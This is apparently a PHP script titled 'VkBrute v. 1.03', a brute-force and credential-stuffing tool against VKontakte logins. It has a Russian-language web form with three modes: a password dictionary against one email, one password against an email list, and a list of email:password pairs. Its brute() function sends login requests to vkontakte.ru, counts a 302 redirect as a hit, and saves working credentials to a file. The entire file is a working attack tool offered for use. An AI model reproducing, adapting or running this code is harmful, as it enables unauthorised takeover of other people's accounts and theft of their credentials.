<?php
#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-
#& VkBrute v. 1.03
#& author Chaak(ICQ:868922)
#&-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-|-
if(!isset($_POST['ok'])){
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ru">
<head>
<title>.::Vkontakte brutforce by ChaaK::.</title>
<style>
body{
background-color: black;
}
table{
color: green;
font-weight: bold;
}
h1{
color: white;
}
</style>
</head>
<body>
<center style="margin-top:70px;">
<form action="" method="POST">
<h1>.::Vkontakte brutforce by ChaaK::.</h1>
<table border="1" width="540" height="240">
<tr><td valign="center" height="78" width="150">Тип атаки:</td><td valign="top">
<table border="0" width="100%" height="100%">
<tr><td><input name="attack" value="1" type="radio" checked="1"></td><td align="left">Атака на один email по списку паролей</td></tr>
<tr><td><input name="attack" value="2" type="radio"></td><td align="left">Атака на один пароль по списку email'ов</td></tr>
<tr><td><input name="attack" value="3" type="radio"></td><td align="left">Атака на список email:password</td></tr>
</table>
</td></tr>
<tr><td width="150" height="15px">E-mail</td><td style="font-size:12px"><input name="email" type="text" value="" size="33"> - для брута(для 1 вида атаки)</td></tr>
<tr><td width="150" height="15px">Пароль</td><td style="font-size:12px"><input name="pass" type="text" value="" size="33"> - для брута(для 2 вида атаки)</td></tr>
<tr><td width="150" height="15px">Словарь*</td><td><input name="dict" type="text" value="dictionary.txt" size="61"></td></tr>
<tr><td width="150" height="15px">Хорошие пароли</td><td><input type="text" name="good" value="good.txt" size="61"></td></tr>
<tr><td width="150" height="15px">Агент</td><td style="font-size:12px"><input type="text" name="user" value="Opera/9.50 (Windows NT 6.0; U; ru)" size="61"></td></tr>
<tr><td width="150" height="15px">Время работы*</td><td style="font-size:13px"><input type="text" name="time" value="0" size="5"> - время работы скрипта в минутах, если 0 - то бесконечно.</td></tr>
<tr><td colspan="2"><input type="submit" name="ok" value="::Начать работу::" style="width: 530px; height: 39px; background-color: black; color: green;"></td></tr>
</table>
</center>
</form>
</body>
</html>
<?php
}else{
set_time_limit(($_POST['time'])*60);
#############################################
$email = $_POST['email'];
$passw = $_POST['pass'];
$dict = @file($_POST['dict']);
$type= $_POST['attack'];
$result = $_POST['good'];
$user_agent = $_POST['user'];
#############################################
function brute($email,$pass) {
$fp=fsockopen("vkontakte.ru",80,$errno,$errstr,10);
$out = "GET /login.php?email=".$email."&pass=".$pass." HTTP/1.0\r\n";
$out .= "Host: vkontakte.ru\r\n";
$out .= "User-Agent: ".$GLOBALS['user_agent']."\r\n";
$out .= "Cookie: income=1\r\n";
$out .= "Content-Type:text/xml; charset=windows-1251\r\n\r\n";
fwrite($fp,$out);
$ans='';
while(!feof($fp))
{
$ans.=fgets($fp,128);
}
fclose($fp);
unset($out);
if(preg_match("/\b302 Found\b/is", $ans)) return true; else return false;
}
if($type==1){
for($i=0;$i<count($dict);$i++){
$dict[$i]=trim($dict[$i]);
if(brute($email,$dict[$i])){
$fp=fopen($result,'ab');
fwrite($fp,$email.':'.$dict[$i]."\n");
fclose($fp);
exit();
}
unset($dict[$i]);
ob_implicit_flush();
}
}elseif($type==2){
for($i=0;$i<count($dict);$i++){
$dict[$i]=trim($dict[$i]);
if(brute($dict[$i],$passw)){
$fp=fopen($result,'ab');
fwrite($fp,$dict[$i].':'.$passw."\n");
fclose($fp);
}
unset($dict[$i]);
ob_implicit_flush();
}
}elseif($type==3){
for($i=0;$i<count($dict);$i++){
$dict[$i]=trim($dict[$i]);
$array = explode(":",$dict[$i]);
if(brute($array[0],$array[1])){
$fp=fopen($result,'ab');
fwrite($fp,$array[0].':'.$array[1]."\n");
fclose($fp);
}
unset($dict[$i]);
ob_implicit_flush();
}
}
echo "Брут завершен! Смотрите результаты в файле <a href='$result'>$result</a>";
}
?>
